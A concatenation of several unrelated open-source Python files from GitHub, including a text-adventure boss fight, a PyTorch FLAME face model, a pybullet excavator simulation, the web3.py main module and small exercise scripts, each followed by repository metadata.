wrong_narr = "Dr. Crime says, 'You are foolish to think you can outsmart me.'"
right1 = "Dr. Crime says, 'That was a lucky guess. Let's see how you do on this next one.'"
right2 = "Dr. Crime says, 'Well, you're smarter than you look. Fine, you won't be able to solve this next one.'"
right3 = "Dr. Crime says, 'Arghhhh, who do you think you are?! You most definitely will not get this next one.'"
right4 = "As you raise up your Magic Sword, Dr. Crime's eyes glisten with fear. You quickly drop the sword, letting" \
" the weight cut Dr. Crime. You rest easy knowing Dr. Crime can no longer poison the city."
# Check all legendary items are in user's inventory to allow user to proceed
legendary_items_status = self.check_legendary()
for status in legendary_items_status:
if status != "On Hand":
informScreen("You need all 4 Legendary items in your inventory to proceed!")
return ""
# Check if user wishes to proceed
if self.enter_lair_confirmation() == 2: # User chooses 'no'
return ""
# Play all boss puzzles
self.narration_screen(story1)
status, number_of_tries = self.game_state.boss_puzzles[0].play_boss_puzzle(number_of_tries)
if status == False:
self.narration_screen(wrong_narr)
return "losegame"
self.narration_screen(right1)
status, number_of_tries = self.game_state.boss_puzzles[1].play_boss_puzzle(number_of_tries)
if status == False:
self.narration_screen(wrong_narr)
return "losegame"
self.narration_screen(right2)
status, number_of_tries = self.game_state.boss_puzzles[2].play_boss_puzzle(number_of_tries)
if status == False:
self.narration_screen(wrong_narr)
return "losegame"
self.narration_screen(right3)
status, number_of_tries = self.game_state.boss_puzzles[3].play_boss_puzzle(number_of_tries)
if status == False:
self.narration_screen(wrong_narr)
return "losegame"
self.narration_screen(right4)
return "wingame"
| farbill/capricornus | gameaction.py | gameaction.py | py | 10,119 | python | en | code | 1 | github-code | 36 |
70563793064 | import os
import pickle
import numpy as np
# Modified from smplx code for FLAME
import torch
import torch.nn as nn
import torch.nn.functional as F
from pytorch3d.transforms import rotation_6d_to_matrix, matrix_to_rotation_6d
from skimage.io import imread
from loguru import logger
from flame.lbs import lbs
I = matrix_to_rotation_6d(torch.eye(3)[None].cuda())
def to_tensor(array, dtype=torch.float32):
if 'torch.tensor' not in str(type(array)):
return torch.tensor(array, dtype=dtype)
def to_np(array, dtype=np.float32):
if 'scipy.sparse' in str(type(array)):
array = array.todense()
return np.array(array, dtype=dtype)
class Struct(object):
def __init__(self, **kwargs):
for key, val in kwargs.items():
setattr(self, key, val)
def rot_mat_to_euler(rot_mats):
# Calculates rotation matrix to euler angles
# Careful for extreme cases of eular angles like [0.0, pi, 0.0]
sy = torch.sqrt(rot_mats[:, 0, 0] * rot_mats[:, 0, 0] +
rot_mats[:, 1, 0] * rot_mats[:, 1, 0])
return torch.atan2(-rot_mats[:, 2, 0], sy)
class FLAME(nn.Module):
"""
borrowed from https://github.com/soubhiksanyal/FLAME_PyTorch/blob/master/FLAME.py
Given FLAME parameters for shape, pose, and expression, this class generates a differentiable FLAME function
which outputs the a mesh and 2D/3D facial landmarks
"""
def __init__(self, config):
super(FLAME, self).__init__()
logger.info(f"[FLAME] Creating the 3DMM from {config.flame_geom_path}")
with open(config.flame_geom_path, 'rb') as f:
ss = pickle.load(f, encoding='latin1')
flame_model = Struct(**ss)
self.dtype = torch.float32
self.register_buffer('faces', to_tensor(to_np(flame_model.f, dtype=np.int64), dtype=torch.long))
# The vertices of the template model
self.register_buffer('v_template', to_tensor(to_np(flame_model.v_template), dtype=self.dtype))
# The shape components and expression
shapedirs = to_tensor(to_np(flame_model.shapedirs), dtype=self.dtype)
shapedirs = torch.cat([shapedirs[:, :, :config.num_shape_params], shapedirs[:, :, 300:300 + config.num_exp_params]], 2)
self.register_buffer('shapedirs', shapedirs)
# The pose components
num_pose_basis = flame_model.posedirs.shape[-1]
posedirs = np.reshape(flame_model.posedirs, [-1, num_pose_basis]).T
self.register_buffer('posedirs', to_tensor(to_np(posedirs), dtype=self.dtype))
#
self.register_buffer('J_regressor', to_tensor(to_np(flame_model.J_regressor), dtype=self.dtype))
parents = to_tensor(to_np(flame_model.kintree_table[0])).long();
parents[0] = -1
self.register_buffer('parents', parents)
self.register_buffer('lbs_weights', to_tensor(to_np(flame_model.weights), dtype=self.dtype))
self.register_buffer('l_eyelid', torch.from_numpy(np.load(f'{os.path.abspath(os.path.dirname(__file__))}/blendshapes/l_eyelid.npy')).to(self.dtype)[None])
self.register_buffer('r_eyelid', torch.from_numpy(np.load(f'{os.path.abspath(os.path.dirname(__file__))}/blendshapes/r_eyelid.npy')).to(self.dtype)[None])
# Register default parameters
self._register_default_params('neck_pose_params', 6)
self._register_default_params('jaw_pose_params', 6)
self._register_default_params('eye_pose_params', 12)
self._register_default_params('shape_params', config.num_shape_params)
self._register_default_params('expression_params', config.num_exp_params)
# Static and Dynamic Landmark embeddings for FLAME
mediapipe_lmk_embedding = np.load('flame/mediapipe/mediapipe_landmark_embedding.npz', allow_pickle=True, encoding='latin1')
lmk_embeddings = np.load(config.flame_lmk_path, allow_pickle=True, encoding='latin1')
lmk_embeddings = lmk_embeddings[()]
self.mediapipe_idx = mediapipe_lmk_embedding['landmark_indices'].astype(int)
self.register_buffer('mp_lmk_faces_idx', torch.from_numpy(mediapipe_lmk_embedding['lmk_face_idx'].astype(int)).to(torch.int64))
self.register_buffer('mp_lmk_bary_coords', torch.from_numpy(mediapipe_lmk_embedding['lmk_b_coords']).to(self.dtype).float())
self.register_buffer('lmk_faces_idx', torch.from_numpy(lmk_embeddings['static_lmk_faces_idx'].astype(int)).to(torch.int64))
self.register_buffer('lmk_bary_coords', torch.from_numpy(lmk_embeddings['static_lmk_bary_coords']).to(self.dtype).float())
self.register_buffer('dynamic_lmk_faces_idx', torch.from_numpy(np.array(lmk_embeddings['dynamic_lmk_faces_idx']).astype(int)).to(torch.int64))
self.register_buffer('dynamic_lmk_bary_coords', torch.from_numpy(np.array(lmk_embeddings['dynamic_lmk_bary_coords'])).to(self.dtype).float())
neck_kin_chain = []
NECK_IDX = 1
curr_idx = torch.tensor(NECK_IDX, dtype=torch.long)
while curr_idx != -1:
neck_kin_chain.append(curr_idx)
curr_idx = self.parents[curr_idx]
self.register_buffer('neck_kin_chain', torch.stack(neck_kin_chain))
def _find_dynamic_lmk_idx_and_bcoords(self, vertices, pose, dynamic_lmk_faces_idx,
dynamic_lmk_b_coords,
neck_kin_chain, cameras, dtype=torch.float32):
"""
Selects the face contour depending on the reletive position of the head
Input:
vertices: N X num_of_vertices X 3
pose: N X full pose
dynamic_lmk_faces_idx: The list of contour face indexes
dynamic_lmk_b_coords: The list of contour barycentric weights
neck_kin_chain: The tree to consider for the relative rotation
dtype: Data type
return:
The contour face indexes and the corresponding barycentric weights
"""
batch_size = vertices.shape[0]
aa_pose = torch.index_select(pose.view(batch_size, -1, 6), 1, neck_kin_chain)
rot_mats = rotation_6d_to_matrix(aa_pose.view(-1, 6)).view([batch_size, -1, 3, 3])
rel_rot_mat = torch.eye(3, device=vertices.device, dtype=dtype).unsqueeze_(dim=0).expand(batch_size, -1, -1)
for idx in range(len(neck_kin_chain)):
rel_rot_mat = torch.bmm(rot_mats[:, idx], rel_rot_mat)
rel_rot_mat = cameras @ rel_rot_mat # Cameras flips z and x, plus multiview needs different lmk sliding per view
y_rot_angle = torch.round(torch.clamp(-rot_mat_to_euler(rel_rot_mat) * 180.0 / np.pi, max=39)).to(dtype=torch.long)
neg_mask = y_rot_angle.lt(0).to(dtype=torch.long)
mask = y_rot_angle.lt(-39).to(dtype=torch.long)
neg_vals = mask * 78 + (1 - mask) * (39 - y_rot_angle)
y_rot_angle = (neg_mask * neg_vals + (1 - neg_mask) * y_rot_angle)
dyn_lmk_faces_idx = torch.index_select(dynamic_lmk_faces_idx, 0, y_rot_angle)
dyn_lmk_b_coords = torch.index_select(dynamic_lmk_b_coords, 0, y_rot_angle)
return dyn_lmk_faces_idx, dyn_lmk_b_coords
def _vertices2landmarks(self, vertices, faces, lmk_faces_idx, lmk_bary_coords):
"""
Calculates landmarks by barycentric interpolation
Input:
vertices: torch.tensor NxVx3, dtype = torch.float32
The tensor of input vertices
faces: torch.tensor (N*F)x3, dtype = torch.long
The faces of the mesh
lmk_faces_idx: torch.tensor N X L, dtype = torch.long
The tensor with the indices of the faces used to calculate the
landmarks.
lmk_bary_coords: torch.tensor N X L X 3, dtype = torch.float32
The tensor of barycentric coordinates that are used to interpolate
the landmarks
Returns:
landmarks: torch.tensor NxLx3, dtype = torch.float32
The coordinates of the landmarks for each mesh in the batch
"""
# Extract the indices of the vertices for each face
# NxLx3
batch_size, num_verts = vertices.shape[:2]
device = vertices.device
lmk_faces = torch.index_select(faces, 0, lmk_faces_idx.view(-1).to(torch.long)).view(batch_size, -1, 3)
lmk_faces += torch.arange(batch_size, dtype=torch.long, device=device).view(-1, 1, 1) * num_verts
lmk_vertices = vertices.view(-1, 3)[lmk_faces].view(batch_size, -1, 3, 3)
landmarks = torch.einsum('blfi,blf->bli', [lmk_vertices, lmk_bary_coords])
return landmarks
def forward(self, shape_params, cameras, trans_params=None, rot_params=None, neck_pose_params=None, jaw_pose_params=None, eye_pose_params=None, expression_params=None, eyelid_params=None):
"""
Input:
trans_params: N X 3 global translation
rot_params: N X 3 global rotation around the root joint of the kinematic tree (rotation is NOT around the origin!)
neck_pose_params (optional): N X 3 rotation of the head vertices around the neck joint
jaw_pose_params (optional): N X 3 rotation of the jaw
eye_pose_params (optional): N X 6 rotations of left (parameters [0:3]) and right eyeball (parameters [3:6])
shape_params (optional): N X number of shape parameters
expression_params (optional): N X number of expression parameters
return:d
vertices: N X V X 3
landmarks: N X number of landmarks X 3
"""
batch_size = shape_params.shape[0]
I = matrix_to_rotation_6d(torch.cat([torch.eye(3)[None]] * batch_size, dim=0).cuda())
if trans_params is None:
trans_params = torch.zeros(batch_size, 3).cuda()
if rot_params is None:
rot_params = I.clone()
if neck_pose_params is None:
neck_pose_params = I.clone()
if jaw_pose_params is None:
jaw_pose_params = I.clone()
if eye_pose_params is None:
eye_pose_params = torch.cat([I.clone()] * 2, dim=1)
if shape_params is None:
shape_params = self.shape_params.expand(batch_size, -1)
if expression_params is None:
expression_params = self.expression_params.expand(batch_size, -1)
# Concatenate identity shape and expression parameters
betas = torch.cat([shape_params, expression_params], dim=1)
# The pose vector contains global rotation, and neck, jaw, and eyeball rotations
full_pose = torch.cat([rot_params, neck_pose_params, jaw_pose_params, eye_pose_params], dim=1)
# FLAME models shape and expression deformations as vertex offset from the mean face in 'zero pose', called v_template
template_vertices = self.v_template.unsqueeze(0).expand(batch_size, -1, -1)
# Use linear blendskinning to model pose roations
vertices, _ = lbs(betas, full_pose, template_vertices,
self.shapedirs, self.posedirs,
self.J_regressor, self.parents,
self.lbs_weights, dtype=self.dtype)
if eyelid_params is not None:
vertices = vertices + self.r_eyelid.expand(batch_size, -1, -1) * eyelid_params[:, 1:2, None]
vertices = vertices + self.l_eyelid.expand(batch_size, -1, -1) * eyelid_params[:, 0:1, None]
lmk_faces_idx = self.lmk_faces_idx.unsqueeze(dim=0).expand(batch_size, -1).contiguous()
lmk_bary_coords = self.lmk_bary_coords.unsqueeze(dim=0).expand(batch_size, -1, -1).contiguous()
dyn_lmk_faces_idx, dyn_lmk_bary_coords = self._find_dynamic_lmk_idx_and_bcoords(
vertices, full_pose, self.dynamic_lmk_faces_idx,
self.dynamic_lmk_bary_coords,
self.neck_kin_chain, cameras, dtype=self.dtype)
lmk_faces_idx = torch.cat([dyn_lmk_faces_idx, lmk_faces_idx], 1)
lmk_bary_coords = torch.cat([dyn_lmk_bary_coords, lmk_bary_coords], 1)
lmk68 = self._vertices2landmarks(vertices, self.faces, lmk_faces_idx, lmk_bary_coords)
mp_lmk_faces_idx = self.mp_lmk_faces_idx.unsqueeze(dim=0).expand(batch_size, -1).contiguous()
mp_lmk_bary_coords = self.mp_lmk_bary_coords.unsqueeze(dim=0).expand(batch_size, -1, -1).contiguous()
mp = self._vertices2landmarks(vertices, self.faces, mp_lmk_faces_idx, mp_lmk_bary_coords)
vertices = vertices + trans_params.unsqueeze(dim=1)
lmk68 = lmk68 + trans_params.unsqueeze(dim=1)
mp = mp + trans_params.unsqueeze(dim=1)
return vertices, lmk68, mp
def _register_default_params(self, param_fname, dim):
default_params = torch.zeros([1, dim], dtype=self.dtype, requires_grad=False)
self.register_parameter(param_fname, nn.Parameter(default_params, requires_grad=False))
class FLAMETex(nn.Module):
def __init__(self, config):
super(FLAMETex, self).__init__()
tex_space = np.load(config.tex_space_path)
# FLAME texture
if 'tex_dir' in tex_space.files:
mu_key = 'mean'
pc_key = 'tex_dir'
n_pc = 200
scale = 1
# BFM to FLAME texture
else:
mu_key = 'MU'
pc_key = 'PC'
n_pc = 199
scale = 255.0
texture_mean = tex_space[mu_key].reshape(1, -1)
texture_basis = tex_space[pc_key].reshape(-1, n_pc)
n_tex = config.tex_params
texture_mean = torch.from_numpy(texture_mean).float()[None, ...] * scale
texture_basis = torch.from_numpy(texture_basis[:, :n_tex]).float()[None, ...] * scale
self.texture = None
self.register_buffer('texture_mean', texture_mean)
self.register_buffer('texture_basis', texture_basis)
self.image_size = config.image_size
self.check_texture(config)
def check_texture(self, config):
path = os.path.join(config.actor, 'texture.png')
if os.path.exists(path):
self.texture = torch.from_numpy(imread(path)).permute(2, 0, 1).cuda()[None, 0:3, :, :] / 255.0
def forward(self, texcode):
if self.texture is not None:
return F.interpolate(self.texture, self.image_size, mode='bilinear')
texture = self.texture_mean + (self.texture_basis * texcode[:, None, :]).sum(-1)
texture = texture.reshape(texcode.shape[0], 512, 512, 3).permute(0, 3, 1, 2)
texture = F.interpolate(texture, self.image_size, mode='bilinear')
texture = texture[:, [2, 1, 0], :, :]
return texture / 255.
| Zielon/metrical-tracker | flame/FLAME.py | FLAME.py | py | 14,729 | python | en | code | 188 | github-code | 36 |
15636919766 | import pybullet as p
import time
import pybullet_data
import math
import numpy as np
physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version
p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally
p.setGravity(0,0,-10)
planeId = p.loadURDF("plane.urdf")
startPos = [0, 0, 1.4054411813121799]
startOrientation = p.getQuaternionFromEuler([0,0,0])
boxId = p.loadURDF("aba_excavator/excavator.urdf",startPos, startOrientation)
for i in range(1000):
p.setJointMotorControl2(boxId, 1 , p.VELOCITY_CONTROL, targetVelocity = 0)
p.setJointMotorControl2(boxId, 2 , p.VELOCITY_CONTROL, targetVelocity = 0.4, force= 250_000)
p.setJointMotorControl2(boxId, 3 , p.VELOCITY_CONTROL, targetVelocity = 0.1, force= 250_000)
p.setJointMotorControl2(boxId, 4 , p.VELOCITY_CONTROL, targetVelocity = 0.1)
# (linkWorldPosition,
# linkWorldOrientation,
# localInertialFramePosition,
# localInertialFrameOrientation,
# worldLinkFramePosition,
# worldLinkFrameOrientation,
# worldLinkLinearVelocity,
# worldLinkAngularVelocity) = p.getLinkState(boxId,4, computeLinkVelocity=1, computeForwardKinematics=1)
# print(linkWorldPosition)
p.stepSimulation()
time.sleep(1.0/240.)
theta0, theta1, theta2, theta3 = p.getJointStates(boxId, [1,2,3,4])
print(theta0[0], theta1[0], theta2[0], theta3[0])
p.disconnect()
| cencencendi/excabot | coba.py | coba.py | py | 1,438 | python | en | code | 0 | github-code | 36 |
28798745541 | # I pledge my honor that I have abided by the Stevens Honor System. Andrew Ozsu
def main():
print("For Mathematical Functions, Please Enter the Number 1")
print("For String Operations, Please Enter the Number 2")
x=int(input("Enter Value: "))
if x==1:
print ("For Addition, Please Enter the Number 1")
print ("For Subtraction, Please Enter the Number 2")
print ("For Multiplication, Please Enter the Number 3")
print ("For Division, Please Enter the Number 4")
y=int(input("Enter Value: "))
if y==1:
a=(input("Enter 2 numbers seperated by a comma: "))
a=a.split(",")
a[0]=int(a[0])
a[1]=int(a[1])
b=a[0]+a[1]
return (b)
if y==2:
c=(input("Enter 2 numbers seperated by a comma: "))
c=c.split(",")
c[0]=int(c[0])
c[1]=int(c[1])
d=c[0]-c[1]
return (d)
if y==3:
e=(input("Enter 2 numbers seperated by a comma: "))
e=e.split(",")
e[0]=int(e[0])
e[1]=int(e[1])
f=e[0]*e[1]
return (f)
if y==4:
g=(input("Enter 2 numbers seperated by a comma: "))
g=g.split(",")
g[0]=int(g[0])
g[1]=int(g[1])
h=g[0]/g[1]
return (h)
else:
return ("Invalid Input")
elif x==2:
print ("To Determine the Number of Vowels in a String; Enter the Number 1")
print ("To Encrypt a String; Enter the Number 2")
z= int(input("Enter Value: "))
if z==1:
q=input("Enter String: ")
count=0
for i in q:
if i=="a":
count+=1
if i=="e":
count+=1
if i=="i":
count+=1
if i=="o":
count+=1
if i=="u":
count+=1
return (count)
if z==2:
j=input("Enter String: ")
for i in j:
x=ord(i)
print(" ",x-4, end = " ")
else:
return ("Invalid Input")
else:
print ("Invalid Input")
| Eric-Wonbin-Sang/CS110Manager | 2020F_quiz_2_pt_2_submissions/ozsuandrew/test2pt2.py | test2pt2.py | py | 2,279 | python | en | code | 0 | github-code | 36 |
43692366228 | def print_result(result):
print(len(result))
for x in result:
print(x)
n = int(input())
guests = []
for _ in range(n):
guests.append(input())
while True:
guest = input()
if guest == 'END':
break
if guest in guests:
guests.remove(guest)
guests = sorted(guests)
print_result(guests)
| AntoniyaV/SoftUni-Exercises | Advanced/Python-advanced-course/02_tuples_and_sets/lab/05_softuni_party.py | 05_softuni_party.py | py | 336 | python | en | code | 0 | github-code | 36 |
30488234848 | from eth_abi.codec import (
ABICodec,
)
from eth_utils import (
add_0x_prefix,
apply_to_return_value,
from_wei,
is_address,
is_checksum_address,
keccak as eth_utils_keccak,
remove_0x_prefix,
to_bytes,
to_checksum_address,
to_int,
to_text,
to_wei,
)
from hexbytes import (
HexBytes,
)
from typing import Any, cast, Dict, List, Optional, Sequence, TYPE_CHECKING
from eth_typing import HexStr, Primitives
from eth_typing.abi import TypeStr
from eth_utils import (
combomethod,
)
from ens import ENS
from web3._utils.abi import (
build_default_registry,
build_strict_registry,
map_abi_data,
)
from web3._utils.decorators import (
deprecated_for,
)
from web3._utils.empty import (
empty,
)
from web3._utils.encoding import (
hex_encode_abi_type,
to_hex,
to_json,
)
from web3._utils.rpc_abi import (
RPC,
)
from web3._utils.module import (
attach_modules,
)
from web3._utils.normalizers import (
abi_ens_resolver,
)
from web3.eth import (
Eth,
)
from web3.geth import (
Geth,
GethAdmin,
GethMiner,
GethPersonal,
GethShh,
GethTxPool,
)
from web3.iban import (
Iban,
)
from web3.manager import (
RequestManager as DefaultRequestManager,
)
from web3.net import (
Net,
)
from web3.parity import (
Parity,
ParityPersonal,
ParityShh,
)
from web3.providers import (
BaseProvider,
)
from web3.providers.eth_tester import (
EthereumTesterProvider,
)
from web3.providers.ipc import (
IPCProvider,
)
from web3.providers.rpc import (
HTTPProvider,
)
from web3.providers.websocket import (
WebsocketProvider,
)
from web3.testing import (
Testing,
)
from web3.types import ( # noqa: F401
Middleware,
MiddlewareOnion,
)
from web3.version import (
Version,
)
if TYPE_CHECKING:
from web3.pm import PM # noqa: F401
def get_default_modules() -> Dict[str, Sequence[Any]]:
return {
"eth": (Eth,),
"net": (Net,),
"version": (Version,),
"parity": (Parity, {
"personal": (ParityPersonal,),
"shh": (ParityShh,),
}),
"geth": (Geth, {
"admin": (GethAdmin,),
"miner": (GethMiner,),
"personal": (GethPersonal,),
"shh": (GethShh,),
"txpool": (GethTxPool,),
}),
"testing": (Testing,),
}
class Web3:
# Providers
HTTPProvider = HTTPProvider
IPCProvider = IPCProvider
EthereumTesterProvider = EthereumTesterProvider
WebsocketProvider = WebsocketProvider
# Managers
RequestManager = DefaultRequestManager
# Iban
Iban = Iban
# Encoding and Decoding
toBytes = staticmethod(to_bytes)
toInt = staticmethod(to_int)
toHex = staticmethod(to_hex)
toText = staticmethod(to_text)
toJSON = staticmethod(to_json)
# Currency Utility
toWei = staticmethod(to_wei)
fromWei = staticmethod(from_wei)
# Address Utility
isAddress = staticmethod(is_address)
isChecksumAddress = staticmethod(is_checksum_address)
toChecksumAddress = staticmethod(to_checksum_address)
# mypy Types
eth: Eth
parity: Parity
geth: Geth
net: Net
def __init__(
self,
provider: Optional[BaseProvider] = None,
middlewares: Optional[Sequence[Any]] = None,
modules: Optional[Dict[str, Sequence[Any]]] = None,
ens: ENS = cast(ENS, empty)
) -> None:
self.manager = self.RequestManager(self, provider, middlewares)
if modules is None:
modules = get_default_modules()
attach_modules(self, modules)
self.codec = ABICodec(build_default_registry())
self.ens = ens
@property
def middleware_onion(self) -> MiddlewareOnion:
return self.manager.middleware_onion
@property
def provider(self) -> BaseProvider:
return self.manager.provider
@provider.setter
def provider(self, provider: BaseProvider) -> None:
self.manager.provider = provider
@property
def clientVersion(self) -> str:
return self.manager.request_blocking(RPC.web3_clientVersion, [])
@property
def api(self) -> str:
from web3 import __version__
return __version__
@staticmethod
@deprecated_for("keccak")
@apply_to_return_value(HexBytes)
def sha3(primitive: Optional[Primitives] = None, text: Optional[str] = None,
hexstr: Optional[HexStr] = None) -> bytes:
return Web3.keccak(primitive, text, hexstr)
@staticmethod
@apply_to_return_value(HexBytes)
def keccak(primitive: Optional[Primitives] = None, text: Optional[str] = None,
hexstr: Optional[HexStr] = None) -> bytes:
if isinstance(primitive, (bytes, int, type(None))):
input_bytes = to_bytes(primitive, hexstr=hexstr, text=text)
return eth_utils_keccak(input_bytes)
raise TypeError(
"You called keccak with first arg %r and keywords %r. You must call it with one of "
"these approaches: keccak(text='txt'), keccak(hexstr='0x747874'), "
"keccak(b'\\x74\\x78\\x74'), or keccak(0x747874)." % (
primitive,
{'text': text, 'hexstr': hexstr}
)
)
@combomethod
@deprecated_for("solidityKeccak")
def soliditySha3(cls, abi_types: List[TypeStr], values: List[Any]) -> bytes:
return cls.solidityKeccak(abi_types, values)
@combomethod
def solidityKeccak(cls, abi_types: List[TypeStr], values: List[Any]) -> bytes:
"""
Executes keccak256 exactly as Solidity does.
Takes list of abi_types as inputs -- `[uint24, int8[], bool]`
and list of corresponding values -- `[20, [-1, 5, 0], True]`
"""
if len(abi_types) != len(values):
raise ValueError(
"Length mismatch between provided abi types and values. Got "
"{0} types and {1} values.".format(len(abi_types), len(values))
)
if isinstance(cls, type):
w3 = None
else:
w3 = cls
normalized_values = map_abi_data([abi_ens_resolver(w3)], abi_types, values)
hex_string = add_0x_prefix(HexStr(''.join(
remove_0x_prefix(hex_encode_abi_type(abi_type, value))
for abi_type, value
in zip(abi_types, normalized_values)
)))
return cls.keccak(hexstr=hex_string)
def isConnected(self) -> bool:
return self.provider.isConnected()
def is_encodable(self, _type: TypeStr, value: Any) -> bool:
return self.codec.is_encodable(_type, value)
@property
def ens(self) -> ENS:
if self._ens is cast(ENS, empty):
return ENS.fromWeb3(self)
else:
return self._ens
@ens.setter
def ens(self, new_ens: ENS) -> None:
self._ens = new_ens
@property
def pm(self) -> "PM":
if hasattr(self, '_pm'):
# ignored b/c property is dynamically set via enable_unstable_package_management_api
return self._pm # type: ignore
else:
raise AttributeError(
"The Package Management feature is disabled by default until "
"its API stabilizes. To use these features, please enable them by running "
"`w3.enable_unstable_package_management_api()` and try again."
)
def enable_unstable_package_management_api(self) -> None:
from web3.pm import PM # noqa: F811
if not hasattr(self, '_pm'):
PM.attach(self, '_pm')
def enable_strict_bytes_type_checking(self) -> None:
self.codec = ABICodec(build_strict_registry())
| MLY0813/FlashSwapForCofixAndUni | FlashSwapForCofixAndUni/venv/lib/python3.9/site-packages/web3/main.py | main.py | py | 7,774 | python | en | code | 70 | github-code | 36 |
21459344158 | from odoo import models, fields
class BuffetMenu(models.Model):
_name = 'buffet.menu'
_description = 'Buffet Menu'
_rec_name = 'type'
type = fields.Char(string="MenuType",help="menu type like breakfast,"
" lunch etc ")
class BuffetMenuItems(models.Model):
_name = 'buffet.menu.item'
_description = 'Buffet Menu Items'
_rec_name = 'menu_type_id'
product_ids = fields.Many2many('product.product', string="Item",
help="menu items in buffet line")
menu_type_id = fields.Many2one('buffet.menu', string="Menu Type",
help="type of menu")
buffet_location_id = fields.Many2one('buffet.location', string="Buffet "
"Location")
User_id = fields.Many2one('res.users', string="Responsible Person",
help="responsible person of buffet")
| Spitzodoo1/fisa-inversiones | buffet/models/buffet_menu.py | buffet_menu.py | py | 984 | python | en | code | 0 | github-code | 36 |
22217047125 | import csv
from ast import literal_eval
import math
import sys
sys.path.append('..')
from scoring.img_ref_builder import ImgRefs
class PatchImageRef(ImgRefs):
def __init__(self, id, bordered_img_shape, patch_window_shape,
probe_mask_file_name, original_img_shape,
border_top, border_left):
self.bordered_img_shape = bordered_img_shape
self.patch_window_shape = patch_window_shape
self.probe_file_id = id
self.probe_mask_file_name = probe_mask_file_name
self.original_img_shape = original_img_shape
self.border_top = border_top
self.border_left = border_left
def __iter__(self):
return iter([self.probe_file_id, self.bordered_img_shape,
self.patch_window_shape, self.probe_mask_file_name,
self.original_img_shape, self.border_top, self.border_left])
class PatchImageRefFactory():
@staticmethod
def create_img_ref(id, bordered_img_shape, patch_window_shape,
probe_mask_file_name, original_img_shape,
border_top, border_left):
return PatchImageRef(id,bordered_img_shape, patch_window_shape,
probe_mask_file_name, original_img_shape,
border_top, border_left)
@staticmethod
def get_img_refs_from_csv(csv_path, starting_index, ending_index, target_index=-1):
if ending_index is -1:
ending_index = math.inf
with open(csv_path, 'r') as f:
reader = csv.reader(f)
headers = next(reader)
patch_img_refs = []
ti = 3 if target_index is -1 else 0
for i, row in enumerate(reader):
if i >= starting_index and i < ending_index:
patch_img_refs.append(PatchImageRefFactory.create_img_ref(
row[0],
literal_eval(row[1]),
literal_eval(row[2]),
row[ti],
literal_eval(row[4]),
int(row[5]),
int(row[6])
))
if i is ending_index:
break
if ending_index == math.inf:
ending_index = len(patch_img_refs)
return patch_img_refs, ending_index
| adibMosharrof/medifor | localization/src/patches/patch_image_ref.py | patch_image_ref.py | py | 2,387 | python | en | code | 0 | github-code | 36 |
24517536 | from itertools import count
import sys
def input(): return sys.stdin.readline().rstrip()
n = int(input())
nums = list(map(int, input().split()))
q = int(input())
lNums = list(map(int, input().split()))
mx = max(max(nums), max(lNums))
dp = [0] * (mx+1)
for a in nums:
dp[a] += 1
for i in range(2, mx+1):
for j in count(1):
if j*j > i: break
if i % j == 0:
dp[i] += dp[j]
if j*j != i and j != 1:
dp[i] += dp[i//j]
print(*(dp[i] for i in lNums))
# 해설에 적힌 코드. 엄청난 테크닉이다...! | kmgyu/baekJoonPractice | Arena solvedAC/2023 arena 1/g.py | g.py | py | 567 | python | en | code | 0 | github-code | 36 |
11614487445 | # Escribir un programa que pregunte por consola el precio de un producto en euros con dos decimales y muestre por pantalla
# el número de euros y el número de céntimos del precio introducido.
def run():
price = round(float(input("Introduzca el precio del producto en euros: ")),2)
euros = int(price)
centimos = round(price % euros,2)
print("El numero de euros es: "+str(euros))
print("El numero de centavos es: "+str(centimos))
if __name__ == "__main__":
run() | Mgobeaalcoba/python_intermediate | cadenas_8.py | cadenas_8.py | py | 489 | python | es | code | 1 | github-code | 36 |
24916338388 | #A个a,B个b
A = 3
B = 8
flaga = 0
flagb = 0
while A>0 and B>0:
if (A>=B or flagb == 2) and flaga !=2: # A>B或者B已经写2次了 且 A不能写超过2次
print('a')
A -= 1
flaga += 1
flagb = 0
else:
print('b')
B -= 1
flagb += 1
flaga = 0
#有剩的
if (A != 0):
for i in range(A):
print('a')
if (B != 0):
for i in range(B):
print('b')
| hehehahaha/study-python | ab.py | ab.py | py | 413 | python | en | code | 0 | github-code | 36 |
185118540 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 10 13:55:54 2021
@author: 44797
"""
from collections import Counter
import collections
class Solution:
def frequencySort(self, nums):
nums_count = collections.OrderedDict(sorted(Counter(nums).items(), key=lambda x: x[0], reverse=True))
output = []
sorted_count = dict(sorted(nums_count.items(), key=lambda x: x[1]))
for i in sorted_count:
for _ in range(nums_count[i]):
output.append(i)
return output
nums = [1,1,2,2,2,3]
sol = Solution().frequencySort(nums)
print(sol) | sicsempatyrannis/Hackarank-Leetcode | Frequency sort.py | Frequency sort.py | py | 642 | python | en | code | 0 | github-code | 36 |
2251918328 | """
For the purpose of annotating RNA types for genomic regions.
"""
#from xplib import DBI
#from cogent.db.ensembl import HostAccount, Genome
def overlap(bed1,bed2):
"""
This function compares overlap of two Bed object from same chromosome
:param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:returns: boolean -- True or False
Example:
>>> from xplib.Annotation import Bed
>>> from AnnoMax import overlap
>>> bed1=Bed(["chr1",10000,12000])
>>> bed2=Bed(["chr1",9000,13000])
>>> print overlap(bed1,bed2)
True
"""
try:
return (bed1.stop>bed2.start) and (bed1.start<bed2.stop)
except: # in case for "NonType" of bed2
return False
def IsProperStrand(bed1, bed2):
"""
This function determines whether the two Bed object is at the same strand
:param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:returns: boolean -- True or False
Example:
>>> from xplib.Annotation import Bed
>>> from AnnoMax import overlap
>>> bed1=Bed(["chr1",10000,12000,'-'])
>>> bed2=Bed(["chr1",9000,13000,'+'])
>>> print IsProperStrand(bed1,bed2)
False
"""
try:
return (bed1.strand == bed2.strand) or (bed1.strand == '.') or (bed2.strand == '.')
except:
return True
def IsPartOf(bed1, bed2):
"""
This function determines whether bed1 is part of bed2
:param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:returns: boolean -- True or False
